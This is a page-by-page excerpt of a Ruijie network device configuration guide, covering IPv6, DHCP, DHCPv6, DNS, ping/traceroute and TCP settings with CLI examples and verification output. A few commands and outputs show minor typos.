  • Page 406 Steps Ruijie(config-if-GigabitEthernet 0/0)#ipv6 redirects Verification Run the show ipv6 interface command to check whether the configuration takes effect. Ruijie#show ipv6 interface gigabitEthernet 0/0 interface GigabitEthernet 0/0 is Down, ifindex: 1, vrf_id 0 address(es): Mac Address: 00:00:00:00:00:00 INET6: FE80::200:FF:FE00:1 [ TENTATIVE ], subnet is FE80::/64...
  • Page 407 Configuring IPv6 DAD Configuration Configure the interface to send three consecutive NS packets during DAD. Steps Ruijie(config-if-GigabitEthernet 0/0)# ipv6 nd dad attempts 3 Verification Run the show ipv6 interface command to check whether the configuration takes effect. Ruijie#show ipv6 interface gigabitEthernet 0/0...
  • Page 408 Configuring RA Packets to Obtain Prefixes from the Prefix Pool Configuration Configure RA packets to obtain prefixes from the prefix pool "ra-pool". Steps Ruijie(config-if-GigabitEthernet 0/0)#peel default ipv6 pool ra-pool Verification Run the show run command to check whether the configuration takes effect. Ruijie(config-if-GigabitEthernet 0/0)#show run interface gigabitEthernet 0/0 Building configuration...
  • Page 409 Configuring the Maximum Number of ND Entries Learned on an Interface Configuration Set the maximum number of ND entries learned on an interface to 100. Steps Ruijie(config-if-GigabitEthernet 0/1)# ipv6 nd cache interface-limit 100 Verification Run the show run command to check whether the configuration takes effect. Ruijie#show run...
  • Page 410 Configuration Effect RFC 5095 abolished the Type 0 routing header. Ruijie devices do not support the Type 0 routing header by default. The administrator can run the ipv6 source-route command to in global configuration mode to enable IPv6 source routing.
  • Page 411 Steps Ruijie(config)#ipv6 source-route Verification Run the show run command to check whether the configuration takes effect. Ruijie#show run | inc ipv6 source-route ipv6 source-route 3.4.4 Configuring the Sending Rate of ICMPv6 Error Messages Configuration Effect Configure the sending rate of ICMPv6 error messages.
  • Page 412 Configuration Guide Configuring IPv6  Configuring the Sending Rate of Other ICMPv6 Error Messages  Optional.  If a device receives many illegal IPv6 packets and thereby generates many ICMPv6 error messages, run the ipv6 icmp error-interval command to restrict the sending rate of ICMPv6 error messages. (This command does not affect the sending rate of ICMPv6 Packet Too Big messages.) Verification Run the show running-config command to check whether the configuration takes effect.
  • Page 413 Ruijie(config)#ipv6 icmp error-interval 1000 10 Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config | include ipv6 icmp error-interval ipv6 icmp error-interval 1000 10 ipv6 icmp error-interval too-big 1000 100 3.4.5 Configuring the IPv6 Hop Limit Configuration Effect Configure the number of hops of a unicast packet to prevent the packet from being unlimitedly transmitted.
  • Page 414  Configuring the IPv6 Hop Limit Configuration Change the IPv6 hop limit of a device to 250. Steps Ruijie(config)#ipv6 hop-limit 250 Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config ipv6 hop-limit 254 3.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services.

  • Page 415: Scenario

    Configuration Guide Configuring DHCPConfiguring DHCP 4 Configuring DHCP 4.1 Overview The Dynamic Host Configuration Protocol (DHCP) is a LAN protocol based on the User Datagram Protocol (UDP) for dynamically assigning reusable network resources, for example, IP addresses. The DHCP works in Client/Server mode. A DHCP client sends a request message to a DHCP server to obtain an IP address and other configurations.

  • Page 416: Scenario

    Configuration Guide Configuring DHCPConfiguring DHCP Figure 4-1 Remark S is an egress gateway working as a DHCP server. A, B, C and D are access switches achieving layer-2 transparent transmission. User 1, User 2, User 3 and User 4 are LAN users. Deployment ...

  • Page 417: Scenario

    Configuration Guide Configuring DHCPConfiguring DHCP Deployment  Enable DHCP Server on S.  Enable DHCP Client on the interfaces of A, B, C and D. 4.2.3 Applying AM Rule on DHCP Server Scenario As shown in Figure 4-3, create a Super VLAN, configure an AM rule and enable DHCP Server on the core switch A. B is an aggregation switch, C an access switch, and D a wireless access device.

  • Page 418: Scenario

    Configuration Guide Configuring DHCPConfiguring DHCP 4.2.4 Deploying DHCP Relay in Wired Network Scenario As shown in the following figure, Switch C and Switch D are access devices for the users in VLAN 10 and VLAN 20 respectively. Switch B is a gateway, and Switch A a core device. The requirements are listed as follows: Switch A works as a DHCP server to assign IP addresses of different network segments dynamically to users in different VLANs.

  • Page 419: Scenario

    Configuration Guide Configuring DHCPConfiguring DHCP AP is a wireless access point. Remark AC is a wireless management device and DHCP Relay agent. DHCP Server is a core device responsible for assigning IP addresses to wireless users. Deployment  Connect AP to AC. ...
  • Page 420 Configuration Guide Configuring DHCPConfiguring DHCP Figure 4-6 Applying AM Rule on DHCP Relay Remark A is a core device. B is a core device. C is an aggregation device. D is a wired access device. E is a wireless access device. Deployment ...

  • Page 421: Dhcp Server

    Basic Concepts  DHCP Server Based on the RFC 2131, Ruijie DHCP server assigns IP addresses to clients and manages these IP addresses.  DHCP Client DHCP Client enables a device to automatically obtain an IP address and configurations from a DHCP server.
  • Page 422 During the negotiation, if a client does not respond to the DHCPOFFER packets in time, servers will send DHCPNAK packets to the client and the client will reinitiate the process. During network construction, Ruijie DHCP servers have the following features: ...

  • Page 423: Dhcp Relay Agent

    Adding Trusted ARP A trusted ARP prevents gateway ARP spoofing. Ruijie devices enabled with DHCP provide a command for pushing a trusted ARP while assigning an address. After this function is enabled, DHCP server pushes it while assigning an IP address to the client to prevent ARP spoofing.

  • Page 424: Scenario

    As defined in RFC3046, an option can be added to indicate a DHCP client's network information when DHCP Relay is performed, so that a DHCP server may assign IP addresses of various privileges based on more accurate information. The option is called Option 82. Currently, Ruijie devices support schemes of relay agent information, which are described as follows: 13.

  • Page 425: Dhcp Client

    Configuration Guide Configuring DHCPConfiguring DHCP In DHCP environment, multiple DHCP servers are deployed for a network, achieving server backup to ensure uninterrupted network operation. After this function is enabled, the DHCP request packet sent by a client contains a server-id option specifying a DHCP server. In alleviating the burden on servers in specific environments, you need to enable this function on a relay agent to send a packet to a specified DHCP server rather than all DHCP servers.
  • Page 426 Configuration Guide Configuring DHCPConfiguring DHCP  By default, DHCP Client is disabled.  In interface configuration mode, you may run the ip address dhcp command to enable DHCP Client.  You need to enable DHCP Client to enable DHCP service. ...
  • Page 427 Configuration Guide Configuring DHCPConfiguring DHCP Configuration Description and Command netbios-node-type Configures a NetBIOS node type on a client. lease-threshold Configures an alarm threshold of an address pool. option Configures a user-defined option. Enables or disables an address pool. pool-status update arp Adds a trusted ARP while assigning addresses from a pool.
  • Page 428 Configuration Guide Configuring DHCPConfiguring DHCP Configuration Description and Command (Optional) It is used to assign IP addresses of different privileges to clients in combination with the information of a physical port. Configuring DHCP Relay Option 82 dhcp relay information Enables DHCP option82. option82 (Optional) It is used to enable a DHCP Relay agent to send DHCP request packets only to a specified server.
  • Page 429 Configuration Guide Configuring DHCPConfiguring DHCP  Configuring Network Number and Subnet Mask of DHCP Address Pool  Mandatory. It defines a range of dynamically assigned addresses.  Run the network command in DHCP address pool configuration mode.  Configuring Default Gateway of Client ...
  • Page 430 Configuration Guide Configuring DHCPConfiguring DHCP  Enabling or Disabling Address Pool  Optional. It is used to enable or disable an address pool. It is enabled by default.  Run the pool-status command in DHCP address pool configuration mode.  Adding Trusted ARP ...
  • Page 431 If the start and end address are not specified, all IP addresses in the network segment are assignable. For Ruijie products, addresses are assigned based on the client’s physical address and ID. Therefore, one client will not be assigned two leases from one address pool. In case of topological redundancy between a client and a server, address assignment may fail.
  • Page 432 Configuration Guide Configuring DHCPConfiguring DHCP Command domain-name domain Parameter domain-name: Defines a domain name of a DHCP client. Description Command DHCP address pool configuration mode Mode Usage Guide You may define a domain name for a client. When the client accesses network through the host name, the domain name will be added automatically to complete the host name.
  • Page 433 Disable an address pool. It is enabled by default. Command DHCP address pool configuration mode Mode Usage Guide A Ruijie wireless product provides a command for you to enable/disable a DHCP address pool.  Adding Trusted ARP Command update arp Parameter...
  • Page 434 The default gateway is 172.16.16.254.  The address lease is 1 day.  xcluded addresses range from 172.16.1.2 to 172.16.1.100. Ruijie(config)# ip dhcp excluded-address 172.16.1.2 172.16.1.100 Ruijie(dhcp-config)# ip dhcp pool net172 Ruijie(dhcp-config)# network 172.16.1.0 255.255.255.0 Ruijie(dhcp-config)# default-router 172.16.1.254 Ruijie(dhcp-config)# lease 1 Verification Run the show run command to display the configuration.
  • Page 435 Configuration Guide Configuring DHCPConfiguring DHCP  Optional. It is used to configure a MAC address.  Run the hardware command in DHCP address pool configuration mode.  Configures Unique Client Identifier  Optional. It is used to configure a static user identifier (UID). ...
  • Page 436 Ruijie(dhcp-config)# network 20.1.1.0 255.255.255.0 Ruijie(dhcp-config)# default-router 172.16.1.254 Ruijie(dhcp-config)# lease 1 0 0 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp ip dhcp pool vlan1 network 20.1.1.0 255.255.255.0 hardware-address 00d0.df34.32a3 Ethernet default-router 20.1.1.1 lease 1 0 0 ...
  • Page 437 Configuration Effect Assign IP addresses according to an AM rule based on a port and a VLAN. Notes Ruijie products support AM rule configuration on Ethernet, GB, FR, PPP and HDLC interfaces. Configuration Steps  Run the address-manage command in config mode.
  • Page 438 Configure a rule based on a specific VLAN and address range. Ruijie(config)# address-manage Ruijie(config-address-manage)# match ip default 172.50.128.0 255.255.128.0 Ruijie(config-address-manage)# match ip 10.1.5.0 255.255.255.0 Gi5/3 vlan 1005 Ruijie(config-address-manage)# match ip 10.1.6.0 255.255.255.0 vlan 1006 Verification 1: Run the show run command to display the configuration.
  • Page 439 Configuration Guide Configuring DHCPConfiguring DHCP 4.4.4 Configuring Global Properties of DHCP Server Configuration Effect Enable a server with specific functions, for example, ping and compulsory NAK. Notes Configuring the command may cause exceptions on other servers. Configuration Steps  Configuring Excluded IP Address ...
  • Page 440 Configuration Guide Configuring DHCPConfiguring DHCP Related Commands  Configuring Excluded IP Address Command ip dhcp excluded-address low-ip-address [ high-ip-address ] Parameter low-ip-address: Indicates a start IP address. Description high-ip-address: Indicates an end IP address. Command Global configuration mode Mode Unless otherwise specified, a DHCP server assigns all the addresses from an IP address pool to DHCP Usage Guide clients.
  • Page 441 Set ping times to 5. Configuratio  Set ping timeout to 800 ms. n Steps Ruijie(config)# ip dhcp ping packet 5 Ruijie(config)# ip dhcp ping timeout 800 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp...
  • Page 442  Configuratio Configure the excluded IP address from 192.168.0.0 to 192.168.255.255. n Steps Ruijie(config)# ip dhcp excluded-address 192.168.0.0 192.168.255.255 Verification Run the show run command to display the configuration. Ruijie(config)#show run | begin ip dhcp ip dhcp excluded-address 192.168.0.0 192.168.255.255 4.4.5 Configuring Basic DHCP Relay Functions...

  • Page 443: Scenario

    Ruijie(config)# interface gigabitEthernet 0/1 Ruijie(config-if)# ip address 192.1.1.1 255.255.255.0 Configure an IP address for the port connected to the server. Ruijie(config)# interface gigabitEthernet 0/2 Ruijie(config-if-gigabitEthernet 0/2)# ip address 172.2.2.2 255.255.255.0 Enable DHCP Server. Ruijie(config)# service dhcp Configure an address pool.
  • Page 444 Configuration Guide Configuring DHCPConfiguring DHCP Ruijie(config-if-gigabitEthernet 0/2)# ip address 172.2.2.1 255.255.255.0 Verification Check whether the client obtains an IP address.  Check whether the client obtains an IP address.  Check the DHCP Relay configuration. The user device obtains an IP address.
  • Page 445 Ruijie(config)# ip dhcp relay information option82 Verification After login to the DHCP relay agent, run the show running-config command in privileged EXEC mode to display DHCP Relay configuration. Ruijie#show ru | incl ip dhcp relay ip dhcp relay information option82 Common Errors ...
  • Page 446 Ruijie(config)# ip dhcp relay check server-id Verification After login to the DHCP relay agent, run the show running-config command in privileged EXEC mode to display DHCP Relay configuration. Ruijie# show running-config | include check server-id ip dhcp relay check server-id Ruijie#...
  • Page 447 Configuration Example  Configuring DHCP Relay Suppression Configuratio  Configure basic DHCP Relay functions. n Steps  Configure DHCP Relay suppression on an interface. Ruijie# configure terminal Ruijie(config)# interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip dhcp relay suppression Ruijie(config-if-GigabitEthernet 0/1)#end Ruijie#...
  • Page 448 Enable DHCP Client on a device so that it obtains IP addresses and configurations dynamically. Notes Ruijie products support DHCP Client configuration on Ethernet, FR, PPP and HDLC interfaces. Configuration Steps Run the ip address dhcp command on an interface.
  • Page 449 Ruijie(config)# interface FastEthernet0/0 Ruijie(config-if-FastEthernet 0/0)#ip address dhcp Verification 1: Run the show run command to display the configuration. Ruijie(config)#show run | begin ip address dhcp ip address dhcp 4.5 Monitoring Clearing Running the clear commands may lose vital information and interrupt services.
  • Page 450 Configuration Guide Configuring DHCPConfiguring DHCP Debugs DHCP packets. debug ip dhcp client Debugs DHCP Relay events. debug ip dhcp relay...
  • Page 451 Configuration Guide Configuring DHCPv6 5 Configuring DHCPv6 5.1 Overview The Dynamic Host Configuration Protocol for IPv6 (DHCPv6) is a protocol that allows a DHCP server to transfer configurations (such as IPv6 addresses) to IPv6 nodes. As compared with other IPv6 address allocation methods, such as manual configuration and stateless automatic address configuration, DHCPv6 provides the address allocation, prefix delegation, and configuration parameter allocation.

  • Page 452: Scenario

    Configuration Guide Configuring DHCPv6  RFC3633: IPv6 Prefix Options for Dynamic Host Configuration Protocol (DHCP) Version 6  RFC3646: DNS Configuration Options for Dynamic Host Configuration Protocol for IPv6 (DHCPv6)  RFC3736: Stateless DHCP Service for IPv6  RFC5417: Control And Provisioning of Wireless Access Points (CAPWAP) Access Controller DHCP Option 5.2 Applications Application Description...

  • Page 453: Scenario

    Configuration Guide Configuring DHCPv6 Deployment  Run the DHCPv6 client on a host in the subnet to obtain an IPv6 address and other parameters.  Run the DHCPv6 server on a device and configure the IPv6 address and other parameters to allocate the IPv6 address and parameters.

  • Page 454: Scenario

    Configuration Guide Configuring DHCPv6 5.2.3 Relay Service Scenario The DHCPv6 relay agent provides the relay service for the DHCPv6 client ad DHCPv6 server on different links to enable communication between them. As shown in Figure 5-4:  Device 1 is enabled with the DHCPv6 relay agent and destined to 3001::2. ...
  • Page 455  Temporary Addresses (TAs), which are hardly used.  Prefix Delegation (PD). Based on the address type, IAs are classified into IA_NA, IA_TA, and IA_PD (three IA-Types). Ruijie DHCPv6 servers support only IA_NA and IA_PD.  Binding A DHCPv6 binding is a manageable address information structure. The address binding data on a DHCPv6 server records the IA and other configurations of every client.
  • Page 456 Packets that may be sent by a DHCPv6 relay agent to another DHCPv6 relay agent or a DHCPv6 server include Relay-reply. Ruijie DHCPv6 servers do not support the Reconfigure packet. Ruijie DHCPv6 clients do not support the Confirm and Reconfigure packets. Overview Feature...
  • Page 457 Configuration Guide Configuring DHCPv6  A DHCPv6 client sends a Solicit message whose destination address is FF02::1:2 and destination port number is 547 within the local link to request address, prefix and configuration parameter allocation. All DHCPv6 servers or DHCPv6 relay agents within the link will receive the Solicit message.
  • Page 458 Configuration Guide Configuring DHCPv6 allocated to the DHCPv6 client. The DHCPv6 client completes configuration based on the information in the Reply message.  Update and Rebinding The DHCPv6 server provides the control address and the updated T1 and T2 in the IA of the message sent to the DHCPv6 client.
  • Page 459 Configuration Guide Configuring DHCPv6 If a DHCPv6 client needs to release an address or a prefix, the DHCPv6 client needs to send a Release message to a DHCPv6 server to notify the DHCPv6 server of the released addresses or prefixes. In this way, the DHCPv6 server can allocate these addresses and prefixes to other DHCPv6 clients.
  • Page 460 Configuration Guide Configuring DHCPv6  The DHCPv6 client includes the IA information of the conflicted addresses in the Decline message.  After receiving the Decline message, the DHCPv6 server marks the addresses in the Decline message as "declined" and will not allocate these addresses . Then, the DHCPv6 server sends a Reply message carrying the state option to the DHCPv6 client.
  • Page 461 Configuration Guide Configuring DHCPv6 5.3.2 Requesting/Allocating Prefixes Configure available prefixes on the DHCPv6 server. By using the prefix delegation of DHCPv6, uplink network devices can allocate address prefixes to downlink network devices, which implements flexible station-level automatic configuration and flexible control of station address space. Working Principle Downlink network devices serve as DHCPv6 clients to exchange messages with the DHCPv6 server to implement address allocation, update, release and other operations.
  • Page 462 Configuration Guide Configuring DHCPv6 5.3.3 Stateless Service When a DHCPv6 client needs only configuration parameters, the DHCPv6 stateless service can be used to obtain related configuration parameters which cannot be obtained through a stateless automatic address configuration protocol, such as the DNS server address.
  • Page 463 Configuration Guide Configuring DHCPv6  If a host receives an RA message containing the O flag, it will enable the stateless service. 5.3.4 Relay Service When the DHCPv6 client and DHCPv6 server are on different links, the DHCPv6 client can relay related messages to the DHCPv6 server through the DHCPv6 relay agent.
  • Page 464 Configuration Guide Configuring DHCPv6 Configuration Description and Command (Optional) It is used to allocate addresses. Configures the address prefixes to be allocated iana-address prefix on the DHCPv6 server. (Optional) It is used to allocate prefixes. Configures prefixes of statically bound addresses prefix-delegation on the DHCPv6 server.
  • Page 465 Configuration Guide Configuring DHCPv6 5.4.1 Configuring the DHCPv6 Server Configuration Effect  An uplink device can automatically allocate DHCPv6 addresses, prefixes and configuration parameters to a downlink device. Notes  To provide the DHCPv6 server service, you must specify a DHCPv6 server configuration pool. ...
  • Page 466 Configuration Guide Configuring DHCPv6  Configuring the DNS Server on the DHCPv6 Server  Optional.  To allocate DNS servers, you should configure the DNS server on all devices that need to provide the DHCPv6 server service.  Configuring Domain Names on the DHCPv6 Server ...
  • Page 467 Configuration Guide Configuring DHCPv6 Command iana-address prefix ipv6-prefix/prefix-length [ lifetime { valid-lifetime | preferred-lifetime } ] ipv6-prefix/prefix-length: Indicates an IPv6 address prefix and the prefix length. Parameter Description lifetime: Sets the valid time of the address allocated to a client. This keyword must be configured together with valid-lifetime and preferred-lifetime.
  • Page 468 Configuration Guide Configuring DHCPv6 pool and allocates the prefix to the client. When the client does not use this prefix, the DHCPv6 server retrieves the prefix .  Configuring a Local IPv6 Prefix Pool Command ipv6 local pool poolname prefix/prefix-length assigned-length Parameter poolname: Indicates the name of a local prefix pool.
  • Page 469 Configure the domain name.  Enable the DHCPv6 server service on an interface. Ruijie# configure terminal Ruijie(config)# ipv6 dhcp pool pool1 Ruijie(config-dhcp)# iana-address prefix 2008:50::/64 lifetime 2000 1000 Ruijie(config-dhcp)# prefix-delegation 2008:2::/64 0003000100d0f82233ac Ruijie(config-dhcp)# dns-server 2008:1::1 Ruijie(config-dhcp)# dns-server 2008:1::2 Ruijie(config-dhcp)# domain-name example.com...
  • Page 470 Configuration Guide Configuring DHCPv6 Ruijie(config-if)# ipv6 dhcp server pool1  Verification Run the show ipv6 dhcp pool command to display the created configuration pool. Ruijie# show ipv6 dhcp pool DHCPv6 pool: pool1 Static bindings: Binding for client 0003000100d0f82233ac IA PD prefix: 2008:2::/64 preferred lifetime 3600, valid lifetime 3600 IANA address range: 2008:50::1/64 ->...
  • Page 471 Configuration Guide Configuring DHCPv6 5.4.2 Configuring the DHCPv6 Relay Configuration Effect  A DHCPv6 relay agent can be configured for address allocation, prefix delegation and parameter allocation to enable communication between the DHCPv6 client and server on different links. Notes ...
  • Page 472 Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)#interface vlan 1 Ruijie(config-if)#ipv6 dhcp relay destination 3001::2 Ruijie(config-if)#ipv6 dhcp relay destination ff02::1:2 vlan 2 Verification Run the show ipv6 dhcp relay destination all command to display the configured destination addresses.
  • Page 473 Configuration Guide Configuring DHCPv6  It is mandatory if the DHCPv6 client needs to obtain configuration parameters. Verification Check whether the interface is enabled with the DHCPv6 client and check the addresses, prefixes and other configuration obtained on the interface. Related Commands ...
  • Page 474  Verification Run the show ipv6 dhcp interface command to display whether the interface is enabled with the DHCPv6 client. Ruijie#show ipv6 dhcp interface GigabitEthernet 0/1 GigabitEthernet 0/1 is in client mode Rapid-Commit: disable  Enabling the DHCPv6 Client Prefix Request ...
  • Page 475 Configuring DHCPv6  Verification Run the show ipv6 dhcp interface command to display whether an interface of the host obtains configuration parameters. Ruijie#show ipv6 dhcp interface GigabitEthernet 0/2 GigabitEthernet 0/2 is in client mode DNS server: 2001::1 Rapid-Commit: disable Common Errors ...
  • Page 476 Configuration Guide Configuring DHCPv6 Displays statistics show ipv6 dhcp server statistics DHCPv6 server. Displays the destination address of show ipv6 dhcp relay destination | interface-type interface-number } the DHCPv6 relay agent. Displays the statistics on sent and show ipv6 dhcp relay statistics received packets after the DHCPv6 relay is enabled on a device.

  • Page 477: Scenario

    Configuration Guide Configuring DNS 6 Configuring DNS 6.1 Overview A Domain Name System (DNS) is a distributed database containing mappings between domain names and IP addresses on the Internet, which facilitate users to access the Internet without remembering IP strings that can be directly accessed by computers.
  • Page 478 Configuration Guide Configuring DNS Figure 6-1 Dynamic Domain Name Resolution Deployment  Deploy DNS Server as the DNS server of Device-A. 6.3 Features Basic Concepts  The DNS consists of a resolver and a DNS server. The DNS server stores the mappings between domain names and IP addresses of all hosts on the network, and implements mutual conversion between the domain names and IP addresses.
  • Page 479 Configuration Guide Configuring DNS The procedure of dynamic domain name resolution is as follows: 14. A user application program (such as Ping or Telnet) requests the IP address mapped to a domain name from the DNS resolver of the system. 15.
  • Page 480 Configuration Guide Configuring DNS Optional. Configuring the DNS ip name-server white-list enable Enables the DNS whitelist function. Whitelist Function Configures IP addresses of valid DNS ip name-server white-list servers. 6.4.1 Configuring Static Domain Name Resolution Configuration Effect The system resolver resolves the IP address mapped to a domain name on a local device. Configuration Steps ...
  • Page 481  Steps Set the IP address of static domain name www.testv6.com to 2001::1 on a device. Ruijie#configure terminal Ruijie(config)# ip host www.test.com 192.168.1.1 Ruijie(config)# ipv6 host www.testv6.com 2001::1 Ruijie(config)# exit Verification Run the show hosts command to check whether the static domain name entry is configured.

  • Page 482: Scenario

    Set the IP address of the DNS server to 192.168.10.1 on the device. Configuration Steps DEVICE#configure terminal DEVICE(config)# ip name-server 192.168.10.1 DEVICE(config)# exit Verification Run the show hosts command to check whether the DNS server is specified. Ruijie(config)#show hosts Name servers are: 192.168.10.1 static Host type Address TTL(sec) 6.5 Monitoring Clearing Running the clear command during device operation may cause data loss or even interrupt services.
  • Page 483 Configuration Guide Configuring DNS Displays DNS parameters. show hosts [ host-name ] Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use. Description Command Debugs the DNS function. debug ip dns...

  • Page 484: Scenario

    Configuration Guide Configuring Network Communication Test Tools 7 Configuring Network Communication Test Tools 7.1 Overview Network communication test tools can be used to check the connectivity of a network and helps you analyze and locate network faults. Network communication test tools include Packet Internet Groper (PING) and Traceroute. Ping is used to check the connectivity and delay of a network.

  • Page 485: Ping Test

    Configuration Guide Configuring Network Communication Test Tools 7.2.2 Host Route Test Scenario As shown in Figure 7-2, Network Device A and Target Host B are connected to the IP network. If both the network device and the target host are connected to the IP network, the host route test aims to check gateways (or routers) that IP packets pass through between the two ends.
  • Page 486 Configuration Guide Configuring Network Communication Test Tools the message, the first router on the path decreases the TTL by 1. As the TTL becomes 0, the router drops the packets and returns an ICMP time exceeded message to the network device. After receiving this message, the traceroute tool learns that this router exists on this path, and then sends an ICMP Request packet with TTL 2 to the destination host to discover the second router.
  • Page 487 Configuration Guide Configuring Network Communication Test Tools Command ping [ipv] [address [length length ] [ntimes times] [timeout seconds] [data data] [source source] [df-bit] [validate] [detail]] Parameter address: Specifies the destination IPv4 address or domain name. Description length: Specifies the length of the data packet. The value ranges from 36 to 18,024. The default length is 100.
  • Page 488 Configuration In Privileged EXEC mode, run the ping 192.168.21.26 command. Steps Common ping command: Ruijie# ping 192.168.21.26 Sending 5, 100-byte ICMP Echoes to 192.168.21.26, timeout is 2 seconds: < press Ctrl+C to break > !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms Detailed ping command: Ruijie#ping 192.168.21.26 detail...
  • Page 489 Configuration Guide Configuring Network Communication Test Tools Common ping command: Ruijie# ping 192.168.21.26 length 1500 ntimes 100 data ffff source 192.168.21.99 timeout 3 Sending 100, 1500-byte ICMP Echoes to 192.168.21.26, timeout is 3 seconds: < press Ctrl+C to break >...
  • Page 490 Configuration In Privileged EXEC mode, run the ping ipv6 2001::1 command. Steps Common ping command: Ruijie# ping ipv6 2001::1 Sending 5, 100-byte ICMP Echoes to 2001::1, timeout is 2 seconds: < press Ctrl+C to break > !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms...
  • Page 491 Configuration Guide Configuring Network Communication Test Tools Ruijie# ping ipv6 2001::5 length 1500 ntimes 100 data ffff source 2001::9 timeout 3 Sending 100, 1500-byte ICMP Echoes to 2000::1, timeout is 3 seconds: < press Ctrl+C to break > !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!
  • Page 492 Configuration Guide Configuring Network Communication Test Tools Configuration Steps  To trace the route an IPv4 packet would follow to the destination host, run the traceroute IPv4 command.  To trace the route an IPv6 packet would follow to the destination host, run the traceroute IPv6 command. Verification Run the traceroute command to display related information on the CLI window.
  • Page 493 Configuration Guide Configuring Network Communication Test Tools Ruijie# traceroute 61.154.22.36 < press Ctrl+C to break > Tracing the route to 61.154.22.36 192.168.12.1 0 msec 0 msec 0 msec 192.168.9.2 4 msec 4 msec 4 msec 192.168.9.1 8 msec 8 msec 4 msec 192.168.0.10...
  • Page 494 Configuration Guide Configuring Network Communication Test Tools Ruijie# traceroute 202.108.37.42 < press Ctrl+C to break > Tracing the route to 202.108.37.42 192.168.12.1 0 msec 0 msec 0 msec 192.168.9.2 0 msec 4 msec 4 msec 192.168.110.1 16 msec 12 msec 16 msec * * * 61.154.8.129...
  • Page 495 Configuration Guide Configuring Network Communication Test Tools Ruijie# traceroute ipv6 3004::1 < press Ctrl+C to break > Tracing the route to 3004::1 3000::1 0 msec 0 msec 0 msec 3001::1 4 msec 4 msec 4 msec 3002::1 8 msec 8 msec 4 msec...
  • Page 496 Configuration Guide Configuring TCP 8 Configuring TCP 8.1 Overview The Transmission Control Protocol (TCP) is a transport-layer protocol providing reliable connection-oriented and IP-based services to for the application layer. Internetwork data flows in 8-bit bytes are sent from the application layer to the TCP layer, and then fragmented into packet segments of a proper length via the TCP.

  • Page 497: Scenario

    Configuration Guide Configuring TCP 8.2.1 Optimizing TCP Performance Scenario For example, TCP connection is established between A and D, as shown in the following figure. The MTU of the link between A and B is 1500 bytes, 1300 bytes between B and C, and 1500 bytes between C and D. To optimize TCP transmission performance, packet fragmentation should be avoided between B and C.
  • Page 498 Configuration Guide Configuring TCP 8.3 Features Basic Concepts  TCP Header Format 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Source Port Destination Port...
  • Page 499 Configuration Guide Configuring TCP  A 16-bit Window value is used to control flows. It specifies the amount of data that may be transmitted from the peer between ACK packets.  Checksum is a 16-bit checksum.  Urgent Pointer is 16-bit and shows the end of the urgent data so that interrupted data flows can continue. When the URG bit is set, the data is given priority over other data flows.
  • Page 500 Configuration Guide Configuring TCP Related Configuration  Configuring TCP SYN Timeout  The default TCP SYN timeout is 20 seconds.  Run the ip tcp synwait-time seconds command in global configuration mode to configure an SYN timeout ranging from 5 to 300 seconds. ...
  • Page 501 Configuration Guide Configuring TCP 8.3.3 Configuring Reset Packet Sending Working Principle When TCP packets are distributed to applications, if the TCP connection a packet belongs to cannot be identified, the local end sends a reset packet to the peer to terminate the TCP connection. Attackers may use port unreachable messages to attack the device.
  • Page 502 Configuration Guide Configuring TCP  Run the ip tcp mss max-segment-size command in global configuration mode to set an MSS. It ranges from 68 to 1000 bytes. By default, the MSS is calculated based on MTU. If an MSS is configured, the effective MSS is the smaller one between the calculated MSS and the configured MSS.
  • Page 503 Configuration Guide Configuring TCP  To avoid packet fragmentation in the case of a small path MTU, you may configure an MSS for TCPv4 SYN packets. The MSS in TCPv4 SYN packets will change to the configured value once the device receives the packets. You may configure an MSS value with reference to the interface MTU.
  • Page 504 Configuration Guide Configuring TCP In version 10.x, the configuration applies to only IPv4 TCP. In version 11.0 or later, it applies to both IPv4 TCP and IPv6 TCP. The service tcp-keepalives-in command is used in version 10.x to enable keeplive on the TCP server. It is disused but compatible in version 11.0.
  • Page 505 Configuration Guide Configuring TCP  Optional.  Configure this on the both ends of TCP connection.  Configuring TCP Window Size  Optional.  Configure this on the both ends of TCP connection.  Configuring the Sending of TCP Reset Packets After Receiving Port Unreachable Messages. ...
  • Page 506 Configuration Guide Configuring TCP in continuous SYN flooding. When a device actively makes a request for a connection with an external device, through telnet for example, shortening SYN timeout reduces user's wait time. You may prolong SYN timeout properly on a poor network. ...
  • Page 507 Run the show tcp pmtu command to display the IPv4 TCP PMTU. Ruijie# show tcp pmtu Number Local Address Foreign Address PMTU 192.168.195.212.23 192.168.195.112.13560 1440 Run the show ipv6 tcp pmtu command to display the IPv6 TCP PMTU. Ruijie# show ipv6 tcp pmtu Number Local Address Foreign Address PMTU...
  • Page 508 Configuring TCP Enable PMTUD for a TCP connection. Adopt the default age timer settings. Configuration Steps Ruijie# configure terminal Ruijie(config)# ip tcp path-mtu-discovery Ruijie(config)# end Verification Run the show tcp pmtu command to display the IPv4 TCP PMTU. 1000::1:23 1000::2.13560...
  • Page 509 If the user receives no TCP packets from the other end after sending keepalive packets four times, the TCP connection is considered inactive. Ruijie# configure terminal Ruijie(config)# ip tcp keepalive interval 60 times 4 idle-period 180 Ruijie(config)# end Verification A user logs in to a device through telnet, and then shuts down the local device.
  • Page 510 Configuration Guide Configuring TCP Description Command show ipv6 tcp pmtu [local-ipv6 X:X:X:X::X] [local-port num] [peer-ipv6 X:X:X: Displays IPv6 TCP PMTU. X::X] [peer-port num] Displays IPv6 TCP port information. show ipv6 tcp port [num] Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use.

  • Page 511: Load Balancing

